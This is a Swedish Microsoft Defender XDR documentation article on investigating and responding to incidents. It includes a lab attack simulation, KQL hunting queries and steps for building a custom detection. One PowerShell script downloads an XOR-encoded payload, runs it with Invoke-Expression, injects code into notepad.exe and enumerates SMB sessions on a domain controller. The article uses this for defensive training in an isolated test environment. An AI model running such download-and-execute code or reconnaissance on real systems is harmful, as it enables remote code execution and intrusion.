Dela via

Undersöka och svara med hjälp av Microsoft Defender XDR

  • Artikel

Gäller för:

  • Microsoft Defender XDR

Den här artikeln beskriver processen för att skapa incidenter med attacksimuleringar och självstudier och använda Microsoft Defender XDR för att undersöka och svara. Innan du påbörjar den här processen bör du se till att du har granskat den övergripande processen för att testa och distribuera Microsoft Defender XDR och att du åtminstone har testat några av komponenterna i Microsoft Defender XDR.

En incident i Microsoft Defender XDR är en samling korrelerade aviseringar och associerade data som utgör berättelsen om en attack. Microsoft 365-tjänster och -appar skapar aviseringar när de identifierar en misstänkt eller skadlig händelse eller aktivitet. Enskilda aviseringar ger värdefulla ledtrådar om en slutförd eller pågående attack. Attacker använder dock vanligtvis olika tekniker mot olika typer av entiteter, till exempel enheter, användare och postlådor. Resultatet är flera aviseringar för flera entiteter i din klientorganisation.

Obs!

Om du är helt ny på säkerhetsanalys och incidenthantering läser du genomgången Svara på din första incident för att få en guidad rundtur i en typisk process för analys, reparation och granskning efter incident.

Distribution från slutpunkt till slutpunkt för Microsoft Defender XDR

Det här är artikel 6 av 6 i en serie som hjälper dig att distribuera komponenterna i Microsoft Defender XDR, inklusive att undersöka och åtgärda incidenter.

Ett diagram som visar incidentundersökning och incidenthantering i piloten och distribuerar Microsoft Defender XDR process.

Artiklarna i den här serien motsvarar följande faser i distributionen från slutpunkt till slutpunkt:

Fas Länk
A. Starta piloten Starta piloten
B. Pilottesta och distribuera Microsoft Defender XDR komponenter - Pilottesta och distribuera Defender for Identity

- Pilottesta och distribuera Defender för Office 365

- Pilottesta och distribuera Defender för Endpoint

- Pilottesta och distribuera Microsoft Defender for Cloud Apps
C. Undersöka och svara på hot Öva incidentundersökning och svar (den här artikeln)

När som helst under pilot- och distributionen kan du testa Microsoft Defender XDR incidenthantering och automatiserade undersöknings- och reparationsfunktioner genom att skapa en incident med en simulerad attack och använda Microsoft Defender-portalen för att undersöka och svara.

Arbetsflöde för incidentundersökning och incidenthantering med hjälp av Microsoft Defender XDR

Här är arbetsflödet för att undersöka och åtgärda incidenter med hjälp av Microsoft Defender XDR i produktionsmiljön.

Ett diagram som visar stegen för incidentundersökning och incidenthantering.

Gör så här:

  1. Simulera attacker med Microsoft Defender-portalen
  2. Prioritera incidenter
  3. Hantera incidenter
  4. Granska automatiserad undersökning och svar med Åtgärdscenter
  5. Använda avancerad jakt

Steg 1. Simulera attacker med Microsoft Defender-portalen

Microsoft Defender-portalen har inbyggda funktioner för att skapa simulerade attacker i pilotmiljön:

Defender för Office 365 träning av attacksimulering

Defender för Office 365 med Microsoft 365 E5 eller Microsoft Defender för Office 365 Plan 2 omfattar träning av attacksimulering för nätfiskeattacker. De grundläggande stegen är:

  1. Skapa en simulering

    Stegvisa instruktioner för hur du skapar och startar en ny simulering finns i Simulera en nätfiskeattack.

  2. Skapa en nyttolast

    Stegvisa instruktioner för hur du skapar en nyttolast för användning i en simulering finns i Skapa en anpassad nyttolast för träning av attacksimulering.

  3. Få insikter

    Stegvisa instruktioner om hur du får insikter med rapportering finns i Få insikter genom träning av attacksimulering.

Mer information finns i Simuleringar.

Självstudier för Defender för Endpoint-attacker & simuleringar

Här är Defender för Endpoint-simuleringar från Microsoft:

  • Dokument släpper bakdörr
  • Automatiserad undersökning (bakdörr)

Det finns ytterligare simuleringar från tredjepartskällor. Det finns också en uppsättning självstudier.

För varje simulering eller självstudie:

  1. Ladda ned och läs motsvarande genomgångsdokument.

  2. Ladda ned simuleringsfilen. Du kan välja att ladda ned filen eller skriptet på testenheten, men det är inte obligatoriskt.

  3. Kör simuleringsfilen eller skriptet på testenheten enligt instruktionerna i genomgångsdokumentet.

Mer information finns i Experience Microsoft Defender för Endpoint through simulated attack (Erfarenhet Microsoft Defender för Endpoint genom simulerad attack).

Simulera en attack med en isolerad domänkontrollant och klientenhet (valfritt)

I den här valfria incidenthanteringsövningen simulerar du en attack på en isolerad Active Directory Domain Services domänkontrollant (AD DS) och En Windows-enhet med hjälp av ett PowerShell-skript och undersöker, åtgärdar och löser sedan incidenten.

Först måste du lägga till slutpunkter i pilotmiljön.

Lägga till slutpunkter för pilotmiljö

Först måste du lägga till en isolerad AD DS-domänkontrollant och en Windows-enhet i pilotmiljön.

  1. Kontrollera att pilotmiljöns klientorganisation har aktiverat Microsoft Defender XDR.

  2. Kontrollera att domänkontrollanten:

  3. Kontrollera att testenheten:

Om du använder klient- och enhetsgrupper skapar du en dedikerad enhetsgrupp för testenheten och push-överför den till den översta nivån.

Ett alternativ är att vara värd för din AD DS-domänkontrollant och testa enheten som virtuella datorer i Microsoft Azure-infrastrukturtjänster. Du kan använda anvisningarna i fas 1 i testlabbguiden för simulerat företag, men hoppa över skapandet av den virtuella datorn APP1.

Här är resultatet.

Ett diagram över utvärderingsmiljön med hjälp av testlabbguiden för simulerat företag.

Du simulerar en sofistikerad attack som använder avancerade tekniker för att dölja för identifiering. Attacken räknar upp öppnade SMB-sessioner (Server Message Block) på domänkontrollanter och hämtar de senaste IP-adresserna för användarnas enheter. Den här kategorin av attacker inkluderar vanligtvis inte filer som släppts på offrets enhet och de sker enbart i minnet. De "lever av marken" med hjälp av befintliga system- och administrativa verktyg och matar in sin kod i systemprocesser för att dölja sin körning. Med det här beteendet kan de undvika identifiering och bevara på enheten.

I den här simuleringen börjar vårt exempelscenario med ett PowerShell-skript. I verkligheten kan en användare luras att köra ett skript eller så kan skriptet köras från en fjärranslutning till en annan dator från en tidigare infekterad enhet, vilket indikerar att angriparen försöker flytta i taget i nätverket. Det kan vara svårt att identifiera dessa skript eftersom administratörer ofta kör skript via fjärranslutning för att utföra olika administrativa aktiviteter.

En skärmbild av Den fillösa PowerShell-attacken med processinmatning och SMB-rekognoseringsattack.

Under simuleringen injicerar attacken shellcode i en till synes oskyldig process. Scenariot kräver användning av notepad.exe. Vi valde den här processen för simuleringen, men angripare skulle mer sannolikt rikta in sig på en tidskrävande systemprocess, till exempel svchost.exe. Shellcode fortsätter sedan med att kontakta angriparens C2-server (command-and-control) för att få instruktioner om hur du fortsätter. Skriptet försöker köra rekognoseringsfrågor mot domänkontrollanten (DC). Med rekognosering kan en angripare få information om den senaste inloggningsinformationen för användaren. När angripare har den här informationen kan de flytta i sidled i nätverket för att komma till ett specifikt känsligt konto

Viktigt

För optimala resultat följer du instruktionerna för attacksimulering så nära som möjligt.

Kör den isolerade AD DS-domänkontrollantens attacksimulering

Så här kör du simuleringen av attackscenariot:

  1. Se till att pilotmiljön innehåller den isolerade AD DS-domänkontrollanten och Windows-enheten.

  2. Logga in på testenheten med testanvändarkontot.

  3. Öppna ett Windows PowerShell fönster på testenheten.

  4. Kopiera följande simuleringsskript:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Obs!

    Om du öppnar den här artikeln i en webbläsare kan det uppstå problem med att kopiera den fullständiga texten utan att förlora vissa tecken eller införa extra radbrytningar. I så fall laddar du ned det här dokumentet och öppnar det på Adobe Reader.

  5. Klistra in och kör det kopierade skriptet i PowerShell-fönstret.

Obs!

Om du kör PowerShell med hjälp av RDP (Remote Desktop Protocol) använder du kommandot Type Urklippstext i RDP-klienten eftersom metoden CTRL-V hotkey eller right-click-paste kanske inte fungerar. De senaste versionerna av PowerShell accepterar ibland inte heller den metoden. Du kan behöva kopiera till Anteckningar i minnet först, kopiera den i den virtuella datorn och sedan klistra in den i PowerShell.

Några sekunder senare öppnas Anteckningar-appen. En simulerad attackkod matas in i Anteckningar. Håll den automatiskt genererade Anteckningar-instansen öppen för att uppleva hela scenariot.

Den simulerade attackkoden försöker kommunicera med en extern IP-adress (simuleraR C2-servern) och försöker sedan rekognosera mot domänkontrollanten via SMB.

Det här meddelandet visas i PowerShell-konsolen när skriptet har slutförts:

ran NetSessionEnum against [DC Name] with return code result 0

Om du vill se funktionen Automatiserad incident och svar i praktiken håller du notepad.exe processen öppen. Du ser att automatiserade incidenter och svar stoppar anteckningarna.

Undersöka incidenten för den simulerade attacken

Obs!

Innan vi går igenom den här simuleringen watch följande video för att se hur incidenthantering hjälper dig att pussla ihop relaterade aviseringar som en del av undersökningsprocessen, där du hittar den i portalen och hur den kan hjälpa dig i dina säkerhetsåtgärder:

Om du växlar till SOC-analytikerns synvinkel kan du nu börja undersöka attacken i Microsoft Defender-portalen.

  1. Öppna Microsoft Defender-portalen.

  2. I navigeringsfönstret väljer du Incidenter & Aviseringsincidenter>.

  3. Den nya incidenten för den simulerade attacken visas i incidentkön.

    En skärmbild av ett exempel på incidentkön.

Undersök attacken som en enskild incident

Microsoft Defender XDR korrelerar analys och aggregerar alla relaterade aviseringar och undersökningar från olika produkter till en incidententitet. Genom att göra det visar Microsoft Defender XDR en bredare attackhistoria, vilket gör det möjligt för SOC-analytikern att förstå och svara på komplexa hot.

Aviseringarna som genereras under den här simuleringen är associerade med samma hot och aggregeras därför automatiskt som en enda incident.

Så här visar du incidenten:

  1. Öppna Microsoft Defender-portalen.

  2. I navigeringsfönstret väljer du Incidenter & Aviseringsincidenter>.

  3. Välj det senaste objektet genom att klicka på cirkeln till vänster om incidentnamnet. En sidopanel visar ytterligare information om incidenten, inklusive alla relaterade aviseringar. Varje incident har ett unikt namn som beskriver det baserat på attributen för de aviseringar som den innehåller.

    Aviseringarna som visas på instrumentpanelen kan filtreras baserat på tjänstresurser: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Microsoft Defender för Endpoint, Microsoft Defender XDR och Microsoft Defender för Office 365.

  4. Välj Sidan Öppna incident för att få mer information om incidenten.

    På sidan Incident kan du se alla aviseringar och information som är relaterade till incidenten. Informationen omfattar de entiteter och tillgångar som är inblandade i aviseringen, identifieringskällan för aviseringarna (till exempel Microsoft Defender for Identity eller Microsoft Defender för Endpoint) och anledningen till att de kopplades samman. I listan med incidentaviseringar visas hur attacken fortskrider. I den här vyn kan du se och undersöka enskilda aviseringar.

    Du kan också klicka på Hantera incident på den högra menyn för att tagga incidenten, tilldela den till dig själv och lägga till kommentarer.

Granska genererade aviseringar

Nu ska vi titta på några av aviseringarna som genererades under den simulerade attacken.

Obs!

Vi går bara igenom några av de aviseringar som genererades under den simulerade attacken. Beroende på vilken version av Windows och Microsoft Defender XDR produkter som körs på testenheten kan du se fler aviseringar som visas i en något annorlunda ordning.

En skärmbild av ett exempel på en genererad avisering.

Avisering: Misstänkt processinmatning observeras (källa: Microsoft Defender för Endpoint)

Avancerade angripare använder avancerade och smygande metoder för att bevara i minnet och gömma sig från identifieringsverktyg. En vanlig teknik är att arbeta inifrån en betrodd systemprocess i stället för en skadlig körbar fil, vilket gör det svårt för identifieringsverktyg och säkerhetsåtgärder att upptäcka den skadliga koden.

För att SOC-analytikerna ska kunna fånga dessa avancerade attacker Microsoft Defender för Endpoint djupminnessensorer i ge vår molntjänst oöverträffad insyn i en mängd olika metoder för kodinmatning mellan processer. Följande bild visar hur Defender för Endpoint identifierades och aviseras vid försöket att mata in kod för att notepad.exe.

En skärmbild av ett exempel på aviseringen om inmatning av en potentiellt skadlig kod.

Avisering: Oväntat beteende som observeras av en process som körs utan kommandoradsargument (källa: Microsoft Defender för Endpoint)

Microsoft Defender för Endpoint identifieringar är ofta inriktade på det vanligaste attributet för en attackteknik. Den här metoden garanterar hållbarhet och höjer fältet så att angripare kan växla till nyare taktiker.

Vi använder storskaliga inlärningsalgoritmer för att fastställa det normala beteendet för vanliga processer i en organisation och över hela världen och watch när dessa processer visar avvikande beteenden. Dessa avvikande beteenden indikerar ofta att överflödig kod introducerades och körs i en annars betrodd process.

I det här scenariot uppvisar processen notepad.exe onormalt beteende, vilket inbegriper kommunikation med en extern plats. Det här resultatet är oberoende av den specifika metod som används för att introducera och köra skadlig kod.

Obs!

Eftersom den här aviseringen baseras på maskininlärningsmodeller som kräver ytterligare serverdelsbearbetning kan det ta lite tid innan du ser den här aviseringen i portalen.

Observera att aviseringsinformationen innehåller den externa IP-adressen – en indikator som du kan använda som en pivot för att expandera undersökningen.

Välj IP-adressen i aviseringsprocessträdet för att visa sidan med IP-adressinformation.

En skärmbild av ett exempel på oväntat beteende av en process som körs utan kommandoradsargument.

Följande bild visar den valda sidan med IP-adressinformation (klicka på IP-adress i aviseringsprocessträdet).

En skärmbild av ett exempel på sidan med IP-adressinformation.

Avisering: SMB (User and IP Address Reconnaissance) (Källa: Microsoft Defender for Identity)

Uppräkning med hjälp av SMB-protokollet (Server Message Block) gör det möjligt för angripare att få den senaste informationen om användarinloggning som hjälper dem att gå sidlede genom nätverket för att få åtkomst till ett specifikt känsligt konto.

I den här identifieringen utlöses en avisering när SMB-sessionsuppräkningen körs mot en domänkontrollant.

En skärmbild av ett exempel på Microsoft Defender for Identity avisering för rekognosering av användare och IP-adresser.

Granska enhetens tidslinje med Microsoft Defender för Endpoint

När du har utforskat de olika aviseringarna i den här incidenten går du tillbaka till incidentsidan som du undersökte tidigare. Välj fliken Enheter på incidentsidan för att granska de enheter som är inblandade i den här incidenten enligt rapporter från Microsoft Defender för Endpoint och Microsoft Defender for Identity.

Välj namnet på den enhet där attacken utfördes för att öppna entitetssidan för den specifika enheten. På den sidan kan du se aviseringar som utlöstes och relaterade händelser.

Välj fliken Tidslinje för att öppna enhetens tidslinje och visa alla händelser och beteenden som observerats på enheten i kronologisk ordning, varvat med de utlösta aviseringarna.

En skärmbild av ett exempel på enhetens tidslinje med beteenden.

Om du expanderar några av de mer intressanta beteendena får du användbar information, till exempel processträd.

Rulla till exempel nedåt tills du hittar aviseringshändelsen Misstänkt processinmatning observerad. Välj den powershell.exe som matas in till notepad.exe processhändelsen under den för att visa hela processträdet för det här beteendet under diagrammet Händelseentiteter i sidofönstret. Använd sökfältet för filtrering om det behövs.

En skärmbild av ett exempel på processträdet för valt beteende för att skapa PowerShell-filer.

Granska användarinformationen med Microsoft Defender for Cloud Apps

På incidentsidan väljer du fliken Användare för att visa listan över användare som är inblandade i attacken. Tabellen innehåller ytterligare information om varje användare, inklusive varje användares undersökningsprioritetspoäng .

Välj användarnamnet för att öppna användarens profilsida där ytterligare undersökning kan utföras. Läs mer om att undersöka riskfyllda användare.

En skärmbild av ett exempel Defender for Cloud Apps användarsida.

Automatiska undersökningar och åtgärd

Obs!

Innan vi går igenom den här simuleringen watch följande video för att bekanta dig med vad automatisk självåterställning är, var du hittar den i portalen och hur den kan hjälpa dig i dina säkerhetsåtgärder:

Gå tillbaka till incidenten i Microsoft Defender-portalen. Fliken Undersökningar på sidan Incident visar de automatiserade undersökningar som utlöstes av Microsoft Defender for Identity och Microsoft Defender för Endpoint. Skärmbilden nedan visar endast den automatiserade undersökning som utlöses av Defender för Endpoint. Som standard reparerar Defender för Endpoint automatiskt artefakterna som finns i kön, vilket kräver reparation.

En skärmbild av ett exempel på de automatiserade undersökningar som är relaterade till incidenten.

Välj den avisering som utlöste en undersökning för att öppna sidan Undersökningsinformation . Du ser följande information:

  • Aviseringar som utlöste den automatiserade undersökningen.
  • Berörda användare och enheter. Om indikatorer hittas på ytterligare enheter visas även dessa ytterligare enheter.
  • Lista över bevis. Entiteterna hittades och analyserades, till exempel filer, processer, tjänster, drivrutiner och nätverksadresser. Dessa entiteter analyseras för möjliga relationer till aviseringen och klassificeras som godartade eller skadliga.
  • Hot hittades. Kända hot som hittas under undersökningen.

Obs!

Beroende på tidpunkten kan den automatiserade undersökningen fortfarande köras. Vänta några minuter tills processen har slutförts innan du samlar in och analyserar bevisen och granskar resultaten. Uppdatera sidan Undersökningsinformation för att få de senaste resultaten.

En skärmbild av ett exempel på sidan Undersökningsinformation.

Under den automatiserade undersökningen identifierade Microsoft Defender för Endpoint den notepad.exe processen, som matades in som en av artefakterna som kräver reparation. Defender för Endpoint stoppar automatiskt den misstänkta processinmatningen som en del av den automatiserade reparationen.

Du kan se notepad.exe försvinna från listan över processer som körs på testenheten.

Lösa incidenten

När undersökningen har slutförts och bekräftats vara åtgärdad löser du incidenten.

På sidan Incident väljer du Hantera incident. Ange status till Lös incident och välj Sann avisering för klassificering och säkerhetstestning för bestämning.

En skärmbild av ett exempel på incidentsidan med den öppna panelen Hantera incident där du kan klicka på växeln för att lösa incidenten.

När incidenten har lösts löser den alla associerade aviseringar i Microsoft Defender-portalen och relaterade portaler.

Detta omsluter attacksimuleringar för incidentanalys, automatiserad undersökning och incidentlösning.

Steg 2. Prioritera incidenter

Du kommer till incidentkön från Incidenter & aviseringar > Incidenter vid snabbstart av Microsoft Defender-portalen. Här är ett exempel.

En skärmbild av avsnittet Incidenter & aviseringar i Microsoft Defender-portalen.

Avsnittet Senaste incidenter och aviseringar visar en graf över antalet mottagna aviseringar och incidenter som skapats under de senaste 24 timmarna.

Om du vill granska listan över incidenter och prioritera deras betydelse för tilldelning och undersökning kan du:

  • Konfigurera anpassningsbara kolumner (välj Välj kolumner) för att ge dig insyn i olika egenskaper för incidenten eller de påverkade entiteterna. Detta hjälper dig att fatta ett välgrundat beslut om prioriteringen av incidenter för analys.

  • Använd filtrering för att fokusera på ett specifikt scenario eller hot. Genom att använda filter i incidentkön kan du avgöra vilka incidenter som kräver omedelbar uppmärksamhet.

I standardincidentkön väljer du Filter för att se fönstret Filter , där du kan ange en specifik uppsättning incidenter. Här är ett exempel.

En skärmbild av fönstret Filter i avsnittet Incidenter & aviseringar i Microsoft Defender-portalen.

Mer information finns i Prioritera incidenter.

Steg 3. Hantera incidenter

Du kan hantera incidenter från fönstret Hantera incident för en incident. Här är ett exempel.

En skärmbild av fönstret Hantera incident i avsnittet Incidenter & aviseringar i Microsoft Defender-portalen.

Du kan visa det här fönstret från länken Hantera incident på:

  • Egenskapsfönstret för en incident i incidentkön.
  • Sammanfattningssida för en incident.

Här är de sätt som du kan hantera dina incidenter på:

  • Redigera incidentnamnet

    Ändra det automatiskt tilldelade namnet baserat på bästa praxis för säkerhetsteamet.

  • Lägga till incidenttaggar

    Lägg till taggar som ditt säkerhetsteam använder för att klassificera incidenter, som kan filtreras senare.

  • Tilldela incidenten

    Tilldela det till ett användarkontonamn som kan filtreras senare.

  • Lösa en incident

    Stäng incidenten när den har åtgärdats.

  • Ange klassificering och bestämning

    Klassificera och välj hottyp när du löser en incident.

  • Lägg till kommentarer

    Använd kommentarer för förlopp, anteckningar eller annan information baserat på bästa praxis för säkerhetsteamet. Den fullständiga kommentarshistoriken är tillgänglig från alternativet Kommentarer och historik på informationssidan för en incident.

Mer information finns i Hantera incidenter.

Steg 4. Granska automatiserad undersökning och svar med Åtgärdscenter

Beroende på hur automatiserade undersöknings- och svarsfunktioner konfigureras för din organisation vidtas reparationsåtgärder automatiskt eller endast efter godkännande av ditt säkerhetsåtgärdsteam. Alla åtgärder, oavsett om de väntar eller slutförs, visas i Åtgärdscenter, som visar väntande och slutförda åtgärder för dina enheter, e-post & samarbetsinnehåll och identiteter på en plats.

Här är ett exempel.

En skärmbild av Unified Action Center i Microsoft Defender-portalen.

Från Åtgärdscenter kan du välja väntande åtgärder och sedan godkänna eller avvisa dem i det utfällbara fönstret. Här är ett exempel.

En skärmbild av fönstret som visar alternativen för att godkänna eller avvisa en åtgärd i Microsoft Defender-portalen.

Godkänn (eller avvisa) väntande åtgärder så snart som möjligt så att dina automatiserade undersökningar kan fortsätta och slutföras i tid.

Mer information finns i Automatiserad undersökning och svar och Åtgärdscenter.

Steg 5: Använda avancerad jakt

Obs!

Innan vi går igenom den avancerade jaktsimuleringen watch följande video för att förstå avancerade jaktbegrepp, se var du hittar den i portalen och veta hur den kan hjälpa dig i dina säkerhetsåtgärder.


Om den valfria fillösa PowerShell-attacksimuleringen var en verklig attack som redan hade nått åtkomststeget för autentiseringsuppgifter kan du använda avancerad jakt när som helst i undersökningen för att proaktivt söka igenom händelser och poster i nätverket med hjälp av det du redan vet från de genererade aviseringarna och de berörda entiteterna.

Baserat på information i SMB-aviseringen (User and IP Address Reconnaissance) kan du till exempel använda IdentityDirectoryEvents tabellen för att hitta alla SMB-sessionsuppräkningshändelser eller hitta fler identifieringsaktiviteter i olika andra protokoll i Microsoft Defender for Identity data med hjälp av IdentityQueryEvents tabellen.

Krav för jaktmiljö

Det finns en enda intern postlåda och enhet som krävs för den här simuleringen. Du behöver också ett externt e-postkonto för att skicka testmeddelandet.

  1. Kontrollera att din klientorganisation har aktiverat Microsoft Defender XDR.

  2. Identifiera en målpostlåda som ska användas för att ta emot e-post.

    • Postlådan måste övervakas av Microsoft Defender för Office 365

    • Enheten från krav 3 måste ha åtkomst till den här postlådan

  3. Konfigurera en testenhet:

    a. Kontrollera att du använder Windows 10 version 1903 eller senare.

    b. Anslut testenheten till testdomänen.

    c. Aktivera Microsoft Defender Antivirus. Om du har problem med att aktivera Microsoft Defender Antivirus kan du läsa det här felsökningsavsnittet.

    d. Registrera för att Microsoft Defender för Endpoint.

Kör simuleringen

  1. Från ett externt e-postkonto skickar du ett e-postmeddelande till postlådan som identifieras i steg 2 i avsnittet krav för jaktmiljö. Inkludera en bifogad fil som tillåts via befintliga principer för e-postfilter. Den här filen behöver inte vara skadlig eller körbar. Föreslagna filtyper är .pdf, .exe (om det tillåts) eller en Office-dokumenttyp, till exempel en Word fil.

  2. Öppna det skickade e-postmeddelandet från enheten som konfigurerats enligt definitionen i steg 3 i avsnittet krav för jaktmiljö. Öppna den bifogade filen eller spara filen på enheten.

Gå på jakt

  1. Öppna Microsoft Defender-portalen.

  2. I navigeringsfönstret väljer du Jakt > Avancerad jakt.

  3. Skapa en fråga som börjar med att samla in e-posthändelser.

    1. Välj Fråga > ny.

    2. I de Email grupperna under Avancerad jakt dubbelklickar du på EmailEvents. Du bör se detta i frågefönstret.

      EmailEvents

    3. Ändra tidsramen för frågan till de senaste 24 timmarna. Om vi antar att e-postmeddelandet som du skickade när du körde simuleringen ovan var under de senaste 24 timmarna, ändrar du annars tidsramen efter behov.

    4. Välj Kör fråga. Du kan ha olika resultat beroende på din pilotmiljö.

      Obs!

      Se nästa steg för filtreringsalternativ för att begränsa datareturen.

      En skärmbild av sidan Avancerad jakt i Microsoft Defender-portalen.

      Obs!

      Avancerad jakt visar frågeresultat som tabelldata. Du kan också välja att visa data i andra formattyper, till exempel diagram.

    5. Titta på resultaten och se om du kan identifiera e-postmeddelandet som du öppnade. Det kan ta upp till två timmar innan meddelandet visas i avancerad jakt. Om du vill begränsa resultatet kan du lägga till where-villkoret i frågan för att bara söka efter e-postmeddelanden som har "yahoo.com" som sin SenderMailFromDomain. Här är ett exempel.

      EmailEvents
| where SenderMailFromDomain == "yahoo.com"

    6. Klicka på de resulterande raderna i frågan så att du kan granska posten.

      En skärmbild av avsnittet Inspektera post på sidan Avancerad jakt i Microsoft Defender-portalen.

  4. Nu när du har kontrollerat att du kan se e-postmeddelandet lägger du till ett filter för de bifogade filerna. Fokusera på alla e-postmeddelanden med bifogade filer i miljön. I den här simuleringen fokuserar du på inkommande e-postmeddelanden, inte de som skickas ut från din miljö. Ta bort eventuella filter som du har lagt till för att hitta meddelandet och lägg till |. where AttachmentCount > 0 and EmailDirection == "Inbound""

    Följande fråga visar resultatet med en kortare lista än din första fråga för alla e-posthändelser:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"

  5. Ta sedan med informationen om den bifogade filen (till exempel: filnamn, hashvärden) i resultatuppsättningen. Det gör du genom att ansluta till tabellen EmailAttachmentInfo . De vanliga fält som ska användas för anslutning är i det här fallet NetworkMessageId och RecipientObjectId.

    Följande fråga innehåller även ytterligare en rad " | project-rename EmailTimestamp=Timestamp" som hjälper dig att identifiera vilken tidsstämpel som var relaterad till e-postmeddelandet jämfört med tidsstämplar relaterade till filåtgärder som du lägger till i nästa steg.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId

  6. Använd sedan SHA256-värdet från tabellen EmailAttachmentInfo för att hitta DeviceFileEvents (filåtgärder som utfördes på slutpunkten) för hashen. Det gemensamma fältet här är SHA256-hashen för den bifogade filen.

    Den resulterande tabellen innehåller nu information från slutpunkten (Microsoft Defender för Endpoint) som enhetsnamn, vilken åtgärd som utfördes (i det här fallet filtrerad för att endast inkludera FileCreated-händelser) och var filen lagrades. Kontonamnet som är associerat med processen inkluderas också.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"

    Nu har du skapat en fråga som identifierar alla inkommande e-postmeddelanden där användaren öppnade eller sparade den bifogade filen. Du kan också förfina den här frågan för att filtrera efter specifika avsändardomäner, filstorlekar, filtyper och så vidare.

  7. Funktioner är en särskild typ av koppling, som gör att du kan hämta mer TI-data om en fil som dess förekomst, undertecknare och utfärdarinformation osv. Om du vill ha mer information om filen använder du funktionsberikningen FileProfile():

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"
| distinct SHA1
| invoke FileProfile()

Skapa en identifiering

När du har skapat en fråga som identifierar information som du vill få aviseringar om om de inträffar i framtiden kan du skapa en anpassad identifiering från frågan.

Anpassade identifieringar kör frågan enligt den frekvens du anger, och resultatet av frågorna skapar säkerhetsaviseringar baserat på de tillgångar som påverkas som du väljer. Dessa aviseringar korreleras med incidenter och kan sorteras som andra säkerhetsaviseringar som genereras av någon av produkterna.

  1. På frågesidan tar du bort raderna 7 och 8 som lades till i steg 7 i go-jaktinstruktionerna och klickar på Skapa identifieringsregel.

    En skärmbild av avsnittet Frågeredigering på sidan Avancerad jakt i Microsoft Defender-portalen.

    Obs!

    Om du klickar på Skapa identifieringsregel och har syntaxfel i frågan sparas inte identifieringsregeln. Dubbelkolla frågan för att säkerställa att det inte finns några fel.

  2. Fyll i de obligatoriska fälten med den information som gör det möjligt för säkerhetsteamet att förstå aviseringen, varför den genererades och vilka åtgärder du förväntar dig att de ska vidta.

    En skärmbild av sidan Aviseringsinformation i Microsoft Defender-portalen.

    Se till att du fyller i fälten med tydlighet för att ge nästa användare ett välgrundat beslut om den här identifieringsregelaviseringen

  3. Välj vilka entiteter som påverkas i den här aviseringen. I det här fallet väljer du Enhet och postlåda.

    En skärmbild av informationssidan Om påverkade entiteter i Microsoft Defender-portalen.

  4. Fastställ vilka åtgärder som ska utföras om aviseringen utlöses. I det här fallet kör du en antivirusgenomsökning, även om andra åtgärder kan vidtas.

    En skärmbild av sidan Åtgärder i Microsoft Defender-portalen.

  5. Välj omfånget för aviseringsregeln. Eftersom den här frågan omfattar enheter är enhetsgrupperna relevanta i den här anpassade identifieringen enligt Microsoft Defender för Endpoint kontext. När du skapar en anpassad identifiering som inte innehåller enheter som påverkade entiteter gäller inte omfånget.

    En skärmbild av omfångssidan i Microsoft Defender-portalen.

    För den här piloten kanske du vill begränsa den här regeln till en delmängd av testenheterna i produktionsmiljön.

  6. Välj Skapa. Välj sedan Anpassade identifieringsregler på navigeringspanelen.

    En skärmbild av alternativet Anpassade regler för identifieringsregler i Microsoft Defender-portalen.

    En skärmbild av sidan som visar identifieringsregler och körningsinformation i Microsoft Defender-portalen.

    På den här sidan kan du välja identifieringsregeln, som öppnar en informationssida.

    En skärmbild av sidan som visar information om utlösta aviseringar i Microsoft Defender-portalen.

Expertutbildning om avancerad jakt

Spårning av angriparen är en webbsändningsserie för nya säkerhetsanalytiker och erfarna hotjägare. Den vägleder dig genom grunderna i avancerad jakt hela vägen till att skapa egna avancerade frågor.

Se Få expertutbildning om avancerad jakt för att komma igång.

Nästa steg

Inkludera information från Undersök och svara med Microsoft Defender XDR i dina SecOps-processer.